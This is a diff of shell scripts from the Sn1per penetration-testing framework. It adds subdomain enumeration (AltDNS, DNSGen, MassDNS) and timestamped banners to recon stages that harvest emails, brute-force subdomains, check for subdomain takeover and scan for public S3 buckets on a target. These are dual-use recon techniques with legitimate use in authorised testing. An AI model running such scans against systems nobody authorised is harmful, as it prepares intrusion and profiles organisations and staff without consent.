if [ "$SLACK_NOTIFICATIONS_METAGOOFIL" == "1" ]; then
|
||||
|
|
@ -44,9 +44,9 @@ if [ "$OSINT" = "1" ]; then
|
|||
fi
|
||||
fi
|
||||
if [ "$HUNTERIO" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING EMAILS VIA HUNTER.IO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
curl -s "https://api.hunter.io/v2/domain-search?domain=$TARGET&api_key=$HUNTERIO_KEY" | egrep "name|value|domain|company|uri|position|phone" 2> /dev/null | tee $LOOT_DIR/osint/hunterio-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
|
|
|
|||
|
|
@ -1,22 +1,22 @@
|
|||
if [ $SCAN_TYPE == "DOMAIN" ] && [ $OSINT == "1" ]; then
|
||||
if [ $OSINT == "0" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED SKIPPING OSINT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
else
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per stage 2 OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
fi
|
||||
if [ $GOOHAK = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING GOOGLE HACKING QUERIES $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
goohak $TARGET > /dev/null
|
||||
fi
|
||||
if [ $INURLBR = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING INURLBR OSINT QUERIES $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
php /usr/share/sniper/bin/inurlbr.php --dork "site:$TARGET" -s inurlbr-$TARGET | tee $LOOT_DIR/osint/inurlbr-$TARGET
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/osint/inurlbr-$TARGET > $LOOT_DIR/osint/inurlbr-$TARGET.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/osint/inurlbr-$TARGET
|
||||
|
|
|
|||
|
|
@ -3,29 +3,29 @@ if [ "$RECON" = "1" ]; then
|
|||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per recon scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
fi
|
||||
cp $LOOT_DIR/domains/domains-$TARGET-full.txt $LOOT_DIR/domains/domains_old-$TARGET.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA SUBLIST3R $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [ "$SUBLIST3R" = "1" ]; then
|
||||
python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
|
||||
fi
|
||||
if [ "$AMASS" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA AMASS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
amass2.9 -ip -brute -active -o $LOOT_DIR/domains/domains-$TARGET-amass.txt -min-for-recursive 3 -d $TARGET 2>/dev/null
|
||||
cut -d, -f1 $LOOT_DIR/domains/domains-$TARGET-amass.txt 2>/dev/null | grep $TARGET > $LOOT_DIR/domains/domains-$TARGET-amass-sorted.txt
|
||||
cut -d, -f2 $LOOT_DIR/domains/domains-$TARGET-amass.txt 2>/dev/null > $LOOT_DIR/domains/domains-$TARGET-amass-ips-sorted.txt
|
||||
fi
|
||||
if [ "$SUBFINDER" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA SUBFINDER (THIS COULD TAKE A WHILE...) $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
subfinder -o $LOOT_DIR/domains/domains-$TARGET-subfinder.txt -b -d $TARGET -w $DOMAINS_DEFAULT -t 100 2>/dev/null
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED BRUTE FORCING DNS SUBDOMAINS VIA DNSCAN (THIS COULD TAKE A WHILE...) $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [ "$DNSCAN" = "1" ]; then
|
||||
python $PLUGINS_DIR/dnscan/dnscan.py -d $TARGET -w $DOMAINS_QUICK -o $LOOT_DIR/domains/domains-dnscan-$TARGET.txt -i $LOOT_DIR/domains/domains-ips-$TARGET.txt
|
||||
cat $LOOT_DIR/domains/domains-dnscan-$TARGET.txt 2>/dev/null | grep $TARGET| awk '{print $3}' | sort -u >> $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
|
||||
|
|
@ -36,24 +36,24 @@ if [ "$RECON" = "1" ]; then
|
|||
echo -e "$OKRED ╔═╗╦═╗╔╦╗╔═╗╦ ╦$RESET"
|
||||
echo -e "$OKRED ║ ╠╦╝ ║ ╚═╗╠═╣$RESET"
|
||||
echo -e "$OKRED ╚═╝╩╚═ ╩o╚═╝╩ ╩$RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING CERTIFICATE SUBDOMAINS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKBLUE"
|
||||
curl -s https://crt.sh/?q=%25.$TARGET > /tmp/curl.out && cat /tmp/curl.out | grep $TARGET | grep TD | sed -e 's/<//g' | sed -e 's/>//g' | sed -e 's/TD//g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | sort -u > $LOOT_DIR/domains/domains-$TARGET-crt.txt && cat $LOOT_DIR/domains/domains-$TARGET-crt.txt
|
||||
echo ""
|
||||
echo -e "${OKRED}[+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-full.txt"
|
||||
fi
|
||||
if [ "$CENSYS_SUBDOMAINS" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING CENSYS SUBDOMAINS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
python $PLUGINS_DIR/censys-subdomain-finder/censys_subdomain_finder.py --censys-api-id $CENSYS_APP_ID --censys-api-secret $CENSYS_API_SECRET $TARGET | egrep "\-" | awk '{print $2}' | tee $LOOT_DIR/domains/domains-$TARGET-censys.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$PROJECT_SONAR" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING PROJECT SONAR SUBDOMAINS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
curl -fsSL "https://dns.bufferover.run/dns?q=.$TARGET" | sed 's/\"//g' | cut -f2 -d "," |sort -u | grep $TARGET | tee $LOOT_DIR/domains/domains-$TARGET-projectsonar.txt 2> /dev/null
|
||||
fi
|
||||
cat $LOOT_DIR/domains/domains-$TARGET-crt.txt 2> /dev/null > /tmp/curl.out 2> /dev/null
|
||||
|
|
@ -63,6 +63,29 @@ if [ "$RECON" = "1" ]; then
|
|||
cat $LOOT_DIR/domains/domains-$TARGET-projectsonar.txt 2> /dev/null >> /tmp/curl.out 2> /dev/null
|
||||
cat $LOOT_DIR/domains/domains-$TARGET-censys.txt 2> /dev/null >> /tmp/curl.out 2> /dev/null
|
||||
cat $LOOT_DIR/domains/targets.txt 2> /dev/null >> /tmp/curl.out 2> /dev/null
|
||||
if [ "$ALT_DNS" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING ALTDNS SUBDOMAINS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
python2 "$INSTALL_DIR/plugins/altdns/altdns.py" -i /tmp/curl.out -w $INSTALL_DIR/wordlists/altdns.txt -o $LOOT_DIR/domains/domains-$TARGET-altdns.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$DNSGEN" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING DNSGEN SUBDOMAINS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
python3 "$INSTALL_DIR/plugins/dnsgen/dnsgen.py" /tmp/curl.out > $LOOT_DIR/domains/domains-$TARGET-dnsgen.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$MASS_DNS" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING MASSDNS ON SUBDOMAINS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
sort -u $LOOT_DIR/domains/domains-$TARGET-dnsgen.txt $LOOT_DIR/domains/domains-$TARGET-altdns.txt 2> /dev/null > $LOOT_DIR/domains/domains-$TARGET-alldns.txt 2> /dev/null
|
||||
/usr/share/sniper/plugins/massdns/bin/massdns -s 5000 -r /usr/share/sniper/plugins/massdns/lists/resolvers.txt $LOOT_DIR/domains/domains-$TARGET-alldns.txt -o S -t AAAA -q -w $LOOT_DIR/domains/domains-$TARGET-massdns.txt
|
||||
awk -F ". " '{print $1}' $LOOT_DIR/domains/domains-$TARGET-massdns.txt | grep -v "*" | sort -u | tee $LOOT_DIR/domains/domains-$TARGET-massdns-sorted.txt
|
||||
cat $LOOT_DIR/domains/domains-$TARGET-massdns-sorted.txt 2> /dev/null >> /tmp/curl.out 2> /dev/null
|
||||
grep "CNAME" $LOOT_DIR/domains/domains-$TARGET-massdns.txt | awk '{print $3}' | grep -v "*" | sort -u | tee $LOOT_DIR/domains/domains-$TARGET-massdns-CNAME.txt
|
||||
grep "A " $LOOT_DIR/domains/domains-$TARGET-massdns.txt | awk '{print $3}' | grep -v "*" | sort -u | tee $LOOT_DIR/domains/domains-$TARGET-massdns-A-records.txt
|
||||
fi
|
||||
sort -u /tmp/curl.out 2> /dev/null > $LOOT_DIR/domains/domains-$TARGET-full.txt
|
||||
rm -f /tmp/curl.out 2> /dev/null
|
||||
diff $LOOT_DIR/domains/domains_old-$TARGET.txt $LOOT_DIR/domains/domains-$TARGET-full.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2}' 2> /dev/null > $LOOT_DIR/domains/domains_new-$TARGET.txt
|
||||
|
|
@ -71,9 +94,9 @@ if [ "$RECON" = "1" ]; then
|
|||
fi
|
||||
echo -e "$RESET"
|
||||
if [ "$SPOOF_CHECK" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED CHECKING FOR EMAIL SECURITY $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
python $PLUGINS_DIR/spoofcheck/spoofcheck.py $TARGET | tee $LOOT_DIR/nmap/email-$TARGET.txt 2>/dev/null
|
||||
echo ""
|
||||
if [ "$SLACK_NOTIFICATIONS_EMAIL_SECURITY" == "1" ]; then
|
||||
|
|
@ -81,12 +104,12 @@ if [ "$RECON" = "1" ]; then
|
|||
fi
|
||||
fi
|
||||
if [ "$SUBHIJACK_CHECK" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED CHECKING FOR CNAME SUBDOMAIN HIJACKING $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
grep -h "CNAME" $LOOT_DIR/nmap/takeovers-* 2>/dev/null | sort -u 2> /dev/null > $LOOT_DIR/nmap/takeovers_old-all.txt
|
||||
dig $TARGET CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null
|
||||
for a in `cat $LOOT_DIR/domains/domains-$TARGET-full.txt`; do dig $a CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" | tee $LOOT_DIR/nmap/takeovers-$a.txt 2>/dev/null; done;
|
||||
dig $TARGET CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|modulus|unbounce|uservoice|wpengine|cloudapp" | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null
|
||||
for a in `cat $LOOT_DIR/domains/domains-$TARGET-full.txt`; do dig $a CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|modulus|unbounce|uservoice|wpengine|cloudapp" | tee $LOOT_DIR/nmap/takeovers-$a.txt 2>/dev/null; done;
|
||||
grep -h "CNAME" $LOOT_DIR/nmap/takeovers-* 2>/dev/null | sort -u 2> /dev/null | awk '{print $1 " " $4 " " $5}' | grep CNAME | sort -u > $LOOT_DIR/nmap/takeovers_new-all.txt
|
||||
diff $LOOT_DIR/nmap/takeovers_old-all.txt $LOOT_DIR/nmap/takeovers_new-all.txt 2> /dev/null | grep "> " | awk '{print $2 " " $3 " " $4}' | sort -u > $LOOT_DIR/nmap/takeovers_new-diff.txt 2> /dev/null
|
||||
if [ "$SLACK_NOTIFICATIONS_TAKEOVERS_NEW" == "1" ]; then
|
||||
|
|
@ -94,9 +117,9 @@ if [ "$RECON" = "1" ]; then
|
|||
fi
|
||||
fi
|
||||
if [ "$SUBOVER" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED STARTING SUBOVER HIJACKING SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
cp $LOOT_DIR/nmap/subover-$TARGET.txt $LOOT_DIR/nmap/subover_old-$TARGET.txt 2> /dev/null
|
||||
cd ~/go/src/github.com/Ice3man543/SubOver
|
||||
subover -l $LOOT_DIR/domains/domains-$TARGET-full.txt | tee $LOOT_DIR/nmap/subover-$TARGET 2>/dev/null
|
||||
|
|
@ -109,9 +132,9 @@ if [ "$RECON" = "1" ]; then
|
|||
cd $INSTALL_DIR
|
||||
fi
|
||||
if [ "$SUBJACK" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED STARTING SUBJACK HIJACKING SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
cp $LOOT_DIR/nmap/subjack-$TARGET.txt $LOOT_DIR/nmap/subjack_old-$TARGET.txt 2> /dev/null
|
||||
~/go/bin/subjack -w $LOOT_DIR/domains/domains-$TARGET-full.txt -t $THREADS -timeout 30 -o $LOOT_DIR/nmap/subjack-$TARGET.txt -a -v
|
||||
diff $LOOT_DIR/nmap/subjack_old-$TARGET.txt $LOOT_DIR/nmap/subjack-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{$1=""; print $0}' 2> /dev/null > $LOOT_DIR/nmap/subjack_new-$TARGET.txt
|
||||
|
|
@ -120,9 +143,9 @@ if [ "$RECON" = "1" ]; then
|
|||
fi
|
||||
fi
|
||||
if [ "$SLURP" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED STARTING PUBLIC S3 BUCKET SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
cd $PLUGINS_DIR/slurp/
|
||||
./slurp-linux-amd64 domain --domain $TARGET | tee $LOOT_DIR/nmap/takeovers-$TARGET-s3-buckets.txt 2>/dev/null
|
||||
if [ "$SLACK_NOTIFICATIONS_S3_BUCKETS" == "1" ]; then
|
||||
|
|
@ -130,9 +153,9 @@ if [ "$RECON" = "1" ]; then
|
|||
fi
|
||||
fi
|
||||
if [ "$SUBNET_RETRIEVAL" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED STARTING SUBNET RETRIEVAL $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
curl -s -L --data "ip=$TARGET" https://2ip.me/en/services/information-service/provider-ip\?a\=act | grep -o -E '[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}/[0-9]{1,2}' | tee $LOOT_DIR/nmap/subnets-$TARGET.txt
|
||||
if [ "$SLACK_NOTIFICATIONS_SUBNETS" == "1" ]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/subnets-$TARGET.txt"
|
||||
|
|
|
|||
264
modes/stealth.sh
264
modes/stealth.sh
|
|
@ -17,7 +17,7 @@ if [ "$MODE" = "stealth" ]; then
|
|||
if [ ! -z "$WORKSPACE" ]; then
|
||||
args="$args -w $WORKSPACE"
|
||||
LOOT_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
|
||||
echo -e "$OKBLUE[*] Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR $OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
mkdir -p $LOOT_DIR 2> /dev/null
|
||||
mkdir $LOOT_DIR/domains 2> /dev/null
|
||||
mkdir $LOOT_DIR/screenshots 2> /dev/null
|
||||
|
|
@ -30,6 +30,7 @@ if [ "$MODE" = "stealth" ]; then
|
|||
args="$args --noreport -m stealth"
|
||||
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running-$TARGET-stealth.txt
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
fi
|
||||
|
|
@ -43,8 +44,8 @@ if [ "$MODE" = "stealth" ]; then
|
|||
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
|
||||
echo -e "$OKRED /_/ $RESET"
|
||||
echo -e "$RESET"
|
||||
echo -e "$OKORANGE + -- --=[https://xerosecurity.com"
|
||||
echo -e "$OKORANGE + -- --=[Sn1per v$VER by @xer0dayz"
|
||||
echo -e "$OKORANGE + -- --=[ https://xerosecurity.com"
|
||||
echo -e "$OKORANGE + -- --=[ Sn1per v$VER by @xer0dayz"
|
||||
echo -e "$OKRED "
|
||||
echo -e "$OKRED ./\."
|
||||
echo -e "$OKRED ./ '\."
|
||||
|
|
@ -74,12 +75,12 @@ if [ "$MODE" = "stealth" ]; then
|
|||
echo -e "$OKRED '\. ./"
|
||||
echo -e "$OKRED '\/"
|
||||
echo -e "$RESET"
|
||||
echo -e "$OKORANGE + -- --=[Launching stealth scan: $TARGET $RESET"
|
||||
echo -e "$OKORANGE + -- --=[ Launching stealth scan: $TARGET $RESET"
|
||||
echo -e "$OKGREEN $RESET"
|
||||
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING WHOIS INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [ "$WHOIS" == "1" ]; then
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN whois $TARGET 2> /dev/null | tee $LOOT_DIR/osint/whois-$TARGET.txt 2> /dev/null $RESET"
|
||||
|
|
@ -89,9 +90,9 @@ if [ "$MODE" = "stealth" ]; then
|
|||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/osint/whois-$TARGET.txt"
|
||||
fi
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING DNS INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN dig all +short $TARGET > $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null"
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN dig all +short -x $TARGET >> $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null"
|
||||
|
|
@ -105,9 +106,9 @@ if [ "$MODE" = "stealth" ]; then
|
|||
|
||||
if [ $SCAN_TYPE == "DOMAIN" ];
|
||||
then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED CHECKING FOR SUBDOMAIN HIJACKING $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN cat $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null | egrep -i \"wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp\" | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null$RESET"
|
||||
fi
|
||||
|
|
@ -120,14 +121,22 @@ if [ "$MODE" = "stealth" ]; then
|
|||
echo ""
|
||||
fi
|
||||
echo ""
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
